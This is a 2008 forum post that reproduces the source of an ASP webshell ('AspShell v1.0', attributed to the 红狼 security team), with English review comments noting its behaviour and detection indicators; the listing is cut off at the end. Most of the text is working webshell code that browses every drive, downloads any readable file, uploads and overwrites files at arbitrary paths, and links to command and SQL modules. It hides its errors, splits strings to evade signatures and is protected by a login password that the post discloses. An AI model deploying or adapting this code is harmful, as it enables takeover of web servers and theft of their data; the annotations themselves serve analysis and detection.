
标题: [讨论]在红狼看见了一个ASP木马 谁来解密一下 [打印本页]

作者: 2000gaobo    时间: 2008-7-23 08:27     标题: [讨论]在红狼看见了一个ASP木马 谁来解密一下

[讨论]在红狼看见了一个ASP木马 谁来解密一下
议题作者:追寻
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)


密码是:20225222。这段代码看上去没有做什么加密,却找不到密码明文。
(注:登录分支并不直接比较明文,而是把提交的密码先经过 Epass() 处理,再与固定字符串 "qt-./31215" 比较;Epass 的定义没有出现在本页贴出的代码片段中,所以源码里看不到明文密码。)




[code]<SCRIPT LANGUAGE="JavaScript">
// Error handler that always reports "handled". It is assigned to
// window.onerror right after this definition, so every client-side script
// error in the page is swallowed instead of being shown to the operator.
function killErrors() {
return true;
}
window.onerror = killErrors;
</SCRIPT>
<script language="JavaScript" type="text/JavaScript">
<!--
// Thin wrapper around window.open(url, name, features).
// NOTE(review): the MM_ prefix and the "//v2.0" tag look like editor-generated
// boilerplate rather than code written for this page; confirm before treating
// the name as a distinguishing indicator.
function MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}

// Thin wrapper around alert(msg).
function MM_popupMsg(msg) { //v1.0
alert(msg);
}
//-->
</script>
<script>
// Toggles the floating MaoDiv panel. When the panel is shown it is filled with
// a text box (default value c:\) and a GO button that navigates to
// ?q=list.asp&attrib=true&path=<typed value>, i.e. the directory listing in
// absolute-path mode. The panel is then positioned next to the mouse pointer.
// NOTE(review): the &#39; sequences are presumably single quotes that the forum
// HTML-encoded when the post was rendered; as displayed here the script would
// not parse.
function ChangeDir(){
  if(MaoDiv.style.display==&#39;block&#39;)
  {  
    MaoDiv.style.display = &#39;none&#39;;}
  else
  {
    MaoDiv.style.display = &#39;block&#39;;
    // The typed path is concatenated into the URL as-is (no encoding).
    MaoDiv.innerHTML = "<CENTER><br> <input type=text name=DirName id=DirName VALUE=&#39;c:\\&#39;> <input type=button onclick=\&#39;javascript:if(DirName.value!=\"\"){location.href=\"?q=list.asp&attrib=true&path=\" + DirName.value;}\&#39; value=GO> <font color=#999999 style=\&#39;cursor:hand\&#39; onclick=\&#39;ChangeDir()\&#39;>CLOSE</font></CENTER>";}

  // Relies on window.event and style.posLeft/posTop for positioning.
  MaoDiv.style.posLeft = window.event.x - 100;
  if(MaoDiv.style.posLeft < 0){
    MaoDiv.style.posLeft = 0;
  }
  MaoDiv.style.posTop = window.event.y + document.body.scrollTop - 10;
  }
</script>
<%Server.ScriptTimeOut=50000%>
<object runat=server id=oFileSys scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%
' Logout branch: q=exit blanks the Session("Password") marker that the other
' branches test, then tells the browser to close the window.
if Request("q")="exit" then
Session("Password")=""
Response.write "<script>alert(&#39;已经成功退出!!!&#39;);window.close();</script>"
end if
' From here on every runtime error is ignored and execution continues with the
' next statement, so failed object creation or file access produces no ASP
' error page (and therefore no obvious trace in the response).
on error resume next
' Page-level ADODB stream holding the raw request body; it is filled by
' upload_5xsoft and read again by FileInfo.SaveAs.
dim Data_5xsoft
' multipart/form-data parser behind the upload feature. On construction it
' reads the whole request body into the page-level stream Data_5xsoft and
' indexes text fields (objForm) and file parts (objFile) by lower-cased field
' name. File contents are not copied; each FileInfo only records an offset and
' length into Data_5xsoft.
' NOTE(review): the ProgIDs are written as "Scr"&b&"ipting.Dictionary" and
' "Ado"&l&"db.Stream". The variables b and l are never assigned in the visible
' code, so they presumably evaluate to empty strings and the calls resolve to
' Scripting.Dictionary and Adodb.Stream. A literal-string signature for those
' ProgIDs will not match this file; detection rules should match the split
' form or normalise string concatenation first.
Class upload_5xsoft
dim objForm,objFile,Version
' Returns the value of text field strForm (case-insensitive), or "" if absent.
Public function Form(strForm)
strForm=lcase(strForm)
if not objForm.exists(strForm) then
Form=""
else
Form=objForm(strForm)
end if
end function

' Returns the FileInfo stored for field strFile (case-insensitive); when the
' field is absent an empty FileInfo is returned instead of Nothing.
Public function File(strFile)
strFile=lcase(strFile)
if not objFile.exists(strFile) then
set File=new FileInfo
else
set File=objFile(strFile)
end if
end function
' Parses the request body as soon as the object is created.
Private Sub Class_Initialize
dim RequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile
dim iFileSize,sFilePath,sFileType,sFormValue,sFileName
dim iFindStart,iFindEnd
dim iFormStart,iFormEnd,sFormName
Version="HTTP Uploader Version 2.0"
set objForm=server.CreateObject("Scr"&b&"ipting.Dictionary")
set objFile=server.CreateObject("Scr"&b&"ipting.Dictionary")
' Nothing to parse for requests without a body.
if Request.TotalBytes<1 then Exit Sub
set tStream = server.CreateObject("Ado"&l&"db.Stream")
set Data_5xsoft = server.CreateObject("Ado"&l&"db.Stream")
' Type 1 / Mode 3: binary stream opened read-write.
Data_5xsoft.Type = 1
Data_5xsoft.Mode =3
Data_5xsoft.Open
' The entire body is buffered in memory; no size limit is applied here.
Data_5xsoft.Write Request.BinaryRead(Request.TotalBytes)
Data_5xsoft.Position=0
RequestData =Data_5xsoft.Read
iFormStart = 1
iFormEnd = LenB(RequestData)
vbCrlf = chrB(13) & chrB(10)
' The first line of the body (up to the first CRLF) is taken as the boundary.
sStart = MidB(RequestData,1, InStrB(iFormStart,RequestData,vbCrlf)-1)
iStart = LenB (sStart)
iFormStart=iFormStart+iStart+1
' One iteration per part, until fewer than ~10 bytes remain.
while (iFormStart + 10) < iFormEnd
' End of this part's header block: position of the blank line (CRLF CRLF) + 3.
iInfoEnd = InStrB(iFormStart,RequestData,vbCrlf & vbCrlf)+3
tStream.Type = 1
tStream.Mode =3
tStream.Open
Data_5xsoft.Position = iFormStart
Data_5xsoft.CopyTo tStream,iInfoEnd-iFormStart
tStream.Position = 0
' Re-read the copied header bytes as text, decoded as gb2312.
tStream.Type = 2
tStream.Charset ="gb2312"
sInfo = tStream.ReadText
tStream.Close
' Next boundary occurrence marks the end of this part's data.
iFormStart = InStrB(iInfoEnd,RequestData,sStart)
' Field name: the text between name=" and the following quote. The search
' starts at character 22, presumably to skip the fixed header prefix.
iFindStart = InStr(22,sInfo,"name=""",1)+6
iFindEnd = InStr(iFindStart,sInfo,"""",1)
sFormName = lcase(Mid (sinfo,iFindStart,iFindEnd-iFindStart))
' A filename=" attribute marks the part as a file upload.
if InStr (45,sInfo,"filename=""",1) > 0 then
set theFile=new FileInfo
iFindStart = InStr(iFindEnd,sInfo,"filename=""",1)+10
iFindEnd = InStr(iFindStart,sInfo,"""",1)
sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
' The client-supplied filename is split on "\" only; it is not sanitised.
theFile.FileName=getFileName(sFileName)
theFile.FilePath=getFilePath(sFileName)
iFindStart = InStr(iFindEnd,sInfo,"Content-Type: ",1)+14
iFindEnd = InStr(iFindStart,sInfo,vbCr)
theFile.FileType =Mid (sinfo,iFindStart,iFindEnd-iFindStart)
' Offset and length of the file bytes inside Data_5xsoft.
theFile.FileStart =iInfoEnd
theFile.FileSize = iFormStart -iInfoEnd -3
theFile.FormName=sFormName
' Only the first file seen for a given field name is kept.
if not objFile.Exists(sFormName) then
objFile.add sFormName,theFile
end if
else
' Plain form field: copy the value bytes and decode them as gb2312 text.
tStream.Type =1
tStream.Mode =3
tStream.Open
Data_5xsoft.Position = iInfoEnd
Data_5xsoft.CopyTo tStream,iFormStart-iInfoEnd-3
tStream.Position = 0
tStream.Type = 2
tStream.Charset ="gb2312"
sFormValue = tStream.ReadText
tStream.Close
' Repeated field names are joined into one comma-separated value.
if objForm.Exists(sFormName) then
objForm(sFormName)=objForm(sFormName)&", "&sFormValue  
else
objForm.Add sFormName,sFormValue
end if
end if
' Step past the boundary to the start of the next part.
iFormStart=iFormStart+iStart+1
wend
RequestData=""
set tStream =nothing
End Sub
' Releases the dictionaries and the body stream; skipped entirely for requests
' without a body, because Class_Initialize exits before creating the stream.
Private Sub Class_Terminate
if Request.TotalBytes>0 then
objForm.RemoveAll
objFile.RemoveAll
set objForm=nothing
set objFile=nothing
Data_5xsoft.Close
set Data_5xsoft =nothing
end if
End Sub
' Returns everything up to and including the last "\" of FullPath ("" for "").
Private function GetFilePath(FullPath)
If FullPath <> "" Then
GetFilePath = left(FullPath,InStrRev(FullPath, "\"))
Else
GetFilePath = ""
End If
End function
' Returns the part of FullPath after the last "\" ("" for ""). Forward slashes
' are not treated as separators.
Private function GetFileName(FullPath)
If FullPath <> "" Then
GetFileName = mid(FullPath,InStrRev(FullPath, "\")+1)
Else
GetFileName = ""
End If
End function
End Class
' Describes one uploaded file part: the form field it came from, the
' client-supplied name/path/content type, and the offset (FileStart) and
' length (FileSize) of its bytes inside the page-level stream Data_5xsoft.
Class FileInfo
dim FormName,FileName,FilePath,FileSize,FileType,FileStart
' Starts empty; FileStart=0 doubles as the "no file" marker used by SaveAs.
Private Sub Class_Initialize
FileName = ""
FilePath = ""
FileSize = 0
FileStart= 0
FormName = ""
FileType = ""
End Sub
' Writes the file bytes to FullPath on the server.
' Return value is inverted relative to what the name suggests: True means
' nothing was written (empty path, no file, or path ending in "/"), False
' means the save statements ran.
' NOTE(review): FullPath is not validated or confined to any directory, and
' SaveToFile is called with option 2, which overwrites an existing file. The
' only limit on where this writes is the file-system permission of the account
' the web application runs as.
Public function SaveAs(FullPath)
dim dr,ErrorChar,i
SaveAs=true
if trim(fullpath)="" or FileStart=0 or FileName="" or right(fullpath,1)="/" then exit function
' Same split-ProgID construction as in upload_5xsoft (l is unassigned in the
' visible code, so this presumably resolves to Adodb.Stream).
set dr=CreateObject("Ado"&l&"db.Stream")
dr.Mode=3
dr.Type=1
dr.Open
' Copy FileSize bytes starting at FileStart out of the buffered request body.
Data_5xsoft.position=FileStart
Data_5xsoft.copyto dr,FileSize
dr.SaveToFile FullPath,2
dr.Close
set dr=nothing
SaveAs=false
end function
End Class
' Entry point of the dispatcher. Every feature of the page is selected by the
' "q" request value (list.asp, down.asp, ... are values of q, not separate
' files), so in web-server logs all activity appears as requests to this one
' script with differing q= parameters.
httpt = Request.ServerVariables("server_name")
Rseb = Request.ServerVariables("script_name")
q=request("q")
' No q supplied: fall through to the login branch, keyed by the script's own path.
if q="" then q=rseb
select case q
case rseb
' Login check. The submitted password is passed through Epass() and the result
' is compared with a fixed string, which is why no plaintext password appears
' in the source. Epass is not defined in the visible part of the listing.
' On success the session is marked with Session("Password")="LunHui"; the
' other branches test only that marker. Both literals are fixed in the file
' and can serve as static indicators when scanning a web root.
if Epass(trim(request.form("password")))="qt-./31215" then
Session("Password")="LunHui"
response.redirect rseb & "?q=list.asp"
else %>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
</head>
<body>
<BR><BR>
<BR><BR>
</font>
<table border="1" width="500" height="80" bgcolor="#DDDDDD" cellpadding="3" bordercolorlight="#000000" bordercolordark="#F2F2F9" cellspacing="0" align=center>
<tr>
<td width="100%" height="30%" bgcolor="#808080"><p align="center">
<font color="#FFFFFF" face="Comic Sans MS" style="font-size: 9pt"><B><%=httpt%></B></font></td>
</tr>
<tr>
<td width="100%" height="70%"><form method="POST" action="<%=rseb%>?q=<%=rseb%>">
<div align="center"><center><p><font face="Comic Sans MS">
<span style="font-size: 9pt">Password: <input type="password" name="password"
size="20" style="background-color:#DDDDDD; border-left: none; border-right: none; border-top: none; border-bottom: solid 1px">
<input type="submit" value="Login" name="B1" style="border: thin outset"></span></font></p>
</center></div>
</form>
</td>
</tr>
</table>
</font>
<%
if request.form("password")<>"" then
response.write "<BR><BR><center><font color=red>轮回大叔很生气! 后果很严重-_-!</font></center>"
end if
%>
</body>
</html>
</font>
<%end if%>
<%case "down.asp"
' Download branch: runs only when the session carries the login marker, then
' streams the file named by the "path" request value back to the client.
if Session("Password")="LunHui" then
call downloadFile(request("path"))
end if
' Sends strFile to the client as an attachment.
' NOTE(review): strFile comes straight from the request and is not validated
' or confined to the web root, so any file readable by the account the web
' application runs as can be retrieved. Requests carrying q=down.asp together
' with an absolute path= value are a useful thing to search access logs for.
function downloadFile(strFile)
strFilename = strFile
Response.Buffer = True
Response.Clear%>
<object runat=server id=s scope=page classid="clsid:00000566-0000-0010-8000-00AA006D2EA4"></object>
<%s.Open
' The stream object "s" is created by the <object classid=...> tag above rather
' than by Server.CreateObject, so no ProgID string appears in the source.
' NOTE(review): that classid presumably identifies ADODB.Stream, and the one on
' oFileSys the FileSystemObject - confirm; if so, the CLSIDs themselves are
' worth adding to static signatures.
s.Type = 1
if not oFileSys.FileExists(strFilename) then
' The requested path is echoed into the HTML response without encoding.
Response.Write("<h1>Error:</h1>" & strFilename & " does not exist<p>")
Response.End
end if
Set f = oFileSys.GetFile(strFilename)
intFilelength = f.size
s.LoadFromFile(strFilename)
if err then
Response.Write("<h1>Error: </h1>" & err.Description & "<p>")
Response.End
end if
Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
Response.AddHeader "Content-Length", intFilelength
Response.CharSet = "UTF-8"
Response.ContentType = "application/octet-stream"
Response.BinaryWrite s.Read
Response.Flush
s.Close
Set s = Nothing
response.end
End Function
' Directory-listing branch (the page shown after login).
case "list.asp"
' NOTE(review): "path" is not assigned anywhere in the visible code, so urlpath
' is presumably the encoding of an empty value - confirm.
urlpath=server.urlencode(path)
if Session("Password")="LunHui" then
dim cpath,lpath
' lpath: the requested path with a trailing "/", defaulting to the site root.
if Request("path")="" then
lpath="/"
else
lpath=Request("path")&"/"
end if
' attrib=true switches to absolute-path mode: the request value is used as a
' file-system path directly (drive letters included). Otherwise the value is
' treated as a virtual path and resolved with Server.MapPath.
if Request("attrib")="true" then
cpath=lpath
attrib="true"
else
cpath=Server.MapPath(lpath)
attrib=""
end if
' Renders the folder pane for cpath: a parent-directory link built from the
' request's "oldpath" value, followed by one client-side so(...) call per
' sub-folder, emitted inside a client VBScript element.
' NOTE(review): lpath, the folder names, Request("path") and Request("oldpath")
' are written into the generated page without any HTML or script encoding.
Sub GetFolder()
dim theFolder,theSubFolders
if oFileSys.FolderExists(cpath)then
Set theFolder=oFileSys.GetFolder(cpath)
Set theSubFolders=theFolder.SubFolders
Response.write "-<a href=&#39;" & rseb & "?q=list.asp&path="&Request("oldpath")&"&attrib="&attrib&"&#39;><font color=&#39;#000000&#39;>上级目录:</font></a><br><script language=vbscript>"
' Each iteration writes one line of client-side script, not HTML.
For Each x In theSubFolders
%>so "<%=lpath%>","<%=x.Name%>","<%=request("path")%>","<%=attrib%>"
<%
Next
%></script>
<%
end if
End Sub
' Renders the file pane for cpath: opens a table and emits one client-side
' sf(...) call per file with its name, size, type, attributes and
' last-modified time. The closing script/table tags are written even when the
' folder does not exist.
' NOTE(review): file names and metadata are written into the generated script
' without encoding.
Sub GetFile()
dim theFiles
if oFileSys.FolderExists(cpath)then
Set theFolder=oFileSys.GetFolder(cpath)
Set theFiles=theFolder.Files
Response.write"<table border=&#39;1&#39; width=&#39;100%&#39; cellpadding=&#39;2&#39; cellspacing=&#39;0&#39; bordercolorlight=&#39;#C6CDDF&#39; bordercolordark=&#39;#FFFFFF&#39;><script language=vbscript>"
For Each x In theFiles
' Both branches assign the same value; the attrib test has no effect here.
if Request("attrib")="true" then
showstring=x.Name
else
showstring=x.Name
end if
%>sf "<%=showstring%>","<%=x.size%>","<%=x.type%>","<%=x.Attributes%>","<%=x.DateLastModified%>","<%=lpath%>","<%=x.name%>","<%=attrib%>","<%=x.name%>"
<%
Next
end if
Response.write"</script></table>"
End Sub
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
<%sub css()%>
<style type="text/css">
BODY,TD {
  FONT-SIZE: <%if UCase(Request.ServerVariables("HTTP_ACCEPT_LANGUAGE"))="ZH-TW" then response.write "10pt" else response.write "11px" end if%>; FONT-FAMILY: sans-serif,Verdana,宋体
  background-attachment: fixed;
  background-repeat: repeat-y;
  background-position: center;
}
Input {
  font-family: "Verdana", "Arial";
  font-size: <%if UCase(Request.ServerVariables("HTTP_ACCEPT_LANGUAGE"))="ZH-TW" then response.write "10pt" else response.write "12px" end if%>;
  font-style: normal;
  line-height: normal;
  font-weight: normal;
  font-variant: normal;
  height: 18px;
  border-right: 1px solid #CCCCCC;
  border-left: 1px solid #CCCCCC;
  border-top: 1px solid #CCCCCC;
  border-bottom: 1px solid #CCCCCC;
}
A:link {
  COLOR: #000000
}
A:visited {
  COLOR: #000000
}
A:active {
  COLOR: #000000
}
A {
  COLOR: #000000; TEXT-DECORATION: none
}
A:hover {
  COLOR: #495E6E
}
table{
  border-bottom: 1px solid #CCCCCC;
  border-top: 1px solid #CCCCCC;
  border-left: 1px solid #CCCCCC;
  border-right: 1px solid #CCCCCC;
  padding:0px
}
.table2{
  border-bottom: 0px;
  border-top: 0px;
  border-left: 0px;
  border-right: 0px;
  padding:0px
}
textarea {
  font-family: "Arial";
  font-size: 12
  font-style: normal;
  line-height: normal;
  font-weight: normal;
  font-variant: normal;
  background:#e5e5e5;
  border-bottom: 1px solid #CCCCCC;
  border-top: 1px solid #CCCCCC;
  border-left: 1px solid #CCCCCC;
  border-right: 1px solid #CCCCCC;
  padding:0px
}
input { border-top-width: 1px; padding-right: 1px; padding-left: 1px;
border-left-width: 1px; border-bottom-width: 1px; border-right-width: 1px;
background-color: #FFFFFF; cursor: hand;
font-size: 9pt; font-family: Verdana, Arial, Helvetica, sans-serif, ??; color: #000000;
}
</style>
<%end sub
call css()
%>
</head>
<div id="MaoDiv" style="background: #F7FBFF;position: absolute; width:250px; height:60px; left:100; top:40; display:none; z-index:9;border-right: 1px solid #CCCCCC;border-left: 1px solid #CCCCCC;border-top: 1px solid #CCCCCC;border-bottom: 1px solid #CCCCCC;"></div>
<script language="JavaScript">
// Opens a new window on q=edit.asp with creat=yes for the name typed in the
// form, under the current lpath. Always returns false.
// NOTE(review): the alert text asks for a folder name although the function is
// named crfile; the messages of crfile and crdir look swapped. The edit.asp
// handler is not part of the visible listing.
function crfile(ls)
{if (ls==""){alert("请输入文件夹名!");}
else {window.open("<%=rseb%>?q=edit.asp&attrib=<%=request("attrib")%>&creat=yes&path=<%=lpath%>"+ls);}
return false;
}
// Opens a new window on q=edir.asp with op=creat for the name typed in the
// form, under the current lpath. Always returns false.
// NOTE(review): the alert text asks for a file name although the function is
// named crdir; see crfile. The edir.asp handler is not part of the visible
// listing.
function crdir(ls)
{if (ls==""){alert("请输入文件名!");}
else {window.open("<%=rseb%>?q=edir.asp&attrib=<%=request("attrib")%>&op=creat&path=<%=lpath%>"+ls);}
return false;
}
</script>
<script language="vbscript">
' Client-side renderer for one file row; called once per file by the script
' that the server-side GetFile sub emits. Writes the name link, size in KB,
' formatted modification time, and the per-file action links
' (properties tooltip, edit, delete, copy, download).
' NOTE(review): urlpath is not defined in this client script block, so in the
' browser it is presumably empty. All values are concatenated into HTML
' without encoding. The action links all point back at the same script with
' q=edit.asp or q=down.asp.
sub sf(showstring,size,type1,Attributes,DateLastModified,lpath,xname,attrib,name)
document.write "<tr>"
document.write "<td width=&#39;40%&#39;><a href=&#39;"& urlpath & lpath & xName &"&#39; target=&#39;_blank&#39;>" & showstring & "</a></td>"
document.write "<td width=&#39;10%&#39; align=&#39;right&#39;>" & round(size/1024,1) & " K</td>"
document.write "<td width=&#39;20%&#39; align=&#39;center&#39;>" & year(DateLastModified) & "-" & right("0"&month(DateLastModified),2) & "-" & right("0"&day(DateLastModified),2) & " " & FormatDateTime(DateLastModified,4) & "</td>"
document.write "<td width=&#39;30%&#39; align=&#39;center&#39;><a href=&#39;javascript:;&#39; title=&#39;类型:" & type1 & chr(10) & "属性:" & Attributes & chr(10) & "时间:" & DateLastModified &"&#39;>属性</a> <a href=javascript:; onClick=MM_openBrWindow(&#39;<%=rseb%>?q=edit.asp&path=" & lpath & xName & "&attrib=" & attrib &"&#39;,&#39;AspShell&#39;,&#39;scrollbars=no,status=yes,width=600,height=440&#39;)>编辑</a> <a href="&chr(34)&"javascript: rmdir1(&#39;"& lpath & xName &"&#39;)"&chr(34)&">删除</a> <a style=&#39;cursor:hand&#39; onclick=copyfile(&#39;" & lpath & Name & "&#39;)>复制</a> <a href=&#39;<%=rseb%>?q=down.asp&path=<%=cpath%>\"&xName&"&attrib=" & attrib &"&#39;>下载</a></td></tr>"
end sub
' Client-side renderer for one sub-folder entry; called once per folder by the
' script that the server-side GetFolder sub emits. Names longer than 26
' characters are shortened to 25 characters plus ".." for display only; the
' links use the full name. Writes a navigation link (q=list.asp, passing the
' current path as oldpath) and a delete link that calls rmdir.
sub so(lpath,xName,path,attrib)
if len(xName)>26 then
DispName=left(xName,25)&".."
else
DispName=xName
end if
document.write " <a href=&#39;<%=rseb%>?q=list.asp&path="& lpath & xName & "&oldpath=" & path & "&attrib=" & attrib &"&#39;>" & DispName &"</a>  <a href="&chr(34)&"javascript: rmdir(&#39;"& lpath & xName &"&#39;)"&chr(34)&">  →删除</a> <br>"
end sub
' Despite the name, this is the file-delete action: after a confirm dialog it
' opens q=edit.asp with op=del for path ls. The server-side handler for
' edit.asp is not part of the visible listing.
sub rmdir1(ls)
if confirm("确定删除文件:"&ls&"?")  then
window.open("<%=rseb%>?q=edit.asp&path=" & ls & "&op=del&attrib=<%=request("attrib")%>")
end if
end sub
' Folder-delete action: after a confirm dialog it opens q=edir.asp with op=del
' for path ls. The server-side handler for edir.asp is not part of the visible
' listing.
sub rmdir(ls)
if confirm("确定删除文件夹:"&ls&"?")  then
window.open("<%=rseb%>?q=edir.asp&path="&ls&"&op=del&attrib=<%=request("attrib")%>")
end if
end sub
' Copy action: prompts for a destination and opens q=edit.asp with op=copy,
' passing the source as path and the destination as dpath.
' Destination handling, as written:
'   - contains ":" or starts with "/": used as given (no lpath prefix);
'   - contains ":" while not in absolute-path mode (attrib<>"true"): refused
'     with an alert;
'   - anything else: prefixed with the current lpath.
' These checks run only in the browser; whether the server-side edit.asp
' handler repeats them cannot be told from the visible listing.
sub copyfile(sfile)
dfile=InputBox("原地址:"&sfile&vbcrlf&"目标地址:"&vbcrlf&"[Input path of current mode]")
dfile=trim(dfile)
' Mode flag copied from the request into the client script by the server.
attrib="<%=request("attrib")%>"
if dfile<>"" then
if InStr(dfile,":") or InStr(dfile,"/")=1 then
lp=""
if InStr(dfile,":") and attrib<>"true" then
alert "No Absolute Path in relative mode!"&vbcrlf&"Error Path: ["&dfile&"]"
exit sub
end if
else
lp="<%=lpath%>"
end if
window.open("<%=rseb%>?q=edit.asp&path="+sfile+"&op=copy&attrib="+attrib+"&dpath="+lp+dfile)
else
alert "请输入文件名!"
end If
end sub
</script>
<body>
</font>
<table border=0 Align=center width=758 cellspacing="0" cellpadding="3">
<tr>
<td colspan=2 height=25>
<font style="font-size:12px" face=Arial> The AspShell v1.0 Write By  <a href="http://www.wolfexp.net/" target="_blank" title="红狼安全小组">C.Rufus Security Team</a></font></td>
</tr>
<tr><td colspan=2 height=5 bgcolor=#808080></td></tr>
<tr>
<td width="100%" bgcolor="#F6F6F6" colspan="2" height="22">
<font style="font-size:12px" face=Arial> 盘符:<%
For Each thing in oFileSys.Drives
Response.write " <a href=&#39;" & rseb & "?q=list.asp&path="&thing.DriveLetter&":&attrib=true&#39;><font color=#000000>"&thing.DriveLetter&":</a></font> "
NEXT
set oScriptNet=Server.CreateObject("WSC"&e&"RIPT.NETWORK")
%> 网络地址: <%=httpt%>   <a href="#" onClick="MM_openBrWindow(&#39;<%=rseb%>?q=jc.asp&#39;,&#39;AspShell&#39;,&#39;scrollbars=yes,width=800,height=600&#39;);MM_popupMsg(&#39;读取系统进程时有点慢\r\r  请不要以为死机了&#39;)">进程查看</a>   <a href="<%=rseb%>?q=exit">退出</a> </font></td>
</tr>
<tr>
<td width="100%" bgcolor="#F6F6F6" colspan="2" height="22">
<font style="font-size:12px" face=Arial> 切换到:<%
if Request("attrib")="true" then
response.write " <a href=&#39;" & rseb & "?q=list.asp&#39;>网站目录</a> "
else
response.write " <a href=&#39;" & rseb & "?attrib=true&q=list.asp&#39;>完整模式</a> "
end if
iisver =Request.ServerVariables("SERVER_SOFTWARE")
%>
当前路径 / 点击跳转:<font color=#999999 title="点击跳转到指定目录" style="cursor:hand" onclick="ChangeDir()"> <%=cpath%> </font>  服务器Ip地址 / 查询Ip绑定: <a href="http://whois.webhosting.info/<%=Request.ServerVariables("LOCAL_ADDR")%>" target="_blank"><%=Request.ServerVariables("LOCAL_ADDR")%></a>
  IIS版本: <%=iisver%> </font>
</td>
</tr>
<tr><td colspan=2 bgcolor=#CCCCCC height=2></td></tr>
<form name="form1" method="post" action="<%=rseb%>?q=upfile.asp" target="_blank" enctype="multipart/form-data">
<tr height="25">
<td bgcolor="#F6F6F6" colspan="2"><font style="font-size:12px" face=Arial>
<input class="table" type="text" name="filename" size="20">
<input class="table" type="button" value="增加文件" onclick="crfile(form1.filename.value)">
<input class="table" type="button" value="增加文件夹" onclick="crdir(form1.filename.value)">
<input type="file" name="file1" class="table" style="width:100" value="" size="30">
<input type="text" name="filepath" class="table" style="width:100" value="<%=cpath%>" size="30">
<input type="hidden" name="act" value="upload">
<input type="hidden" name="upcount" class="table" value="1">
<input class="table" type="submit" value="上传">
<input class="table" type="button" onclick="window.open(&#39;<%=rseb%>?q=cmd.asp&#39;,&#39;_blank&#39;)" value="CMD">
<input class="table" type="button" onclick="window.open(&#39;<%=rseb%>?q=p.asp&#39;,&#39;_blank&#39;)" value="免FSO">
<input class="table" type="button" onclick="window.open(&#39;<%=rseb%>?q=sql.asp&#39;,&#39;_blank&#39;)" value="数据管理">
</span>
</td>
</font>
</td>
</tr></form>
<tr>
<td colspan=2 bgcolor=#CCCCCC height=2>
</td>
</tr>
<tr>
<td width="25%" valign="top" bgcolor="#F6F6F6"><%Call GetFolder()%></td>
<td width="75%" valign="top"><%Call GetFile()%></td>
</tr>
</table>
<table border=0 Align=center width=758 cellspacing="0" cellpadding="3">
<tr><td colspan=2 height=5 bgcolor=#808080></td></tr>
<tr>
</td>
<td colspan=2 Align=Right style="font-family:sans-serif,Verdana;font-size:11px;color:black">Copyright





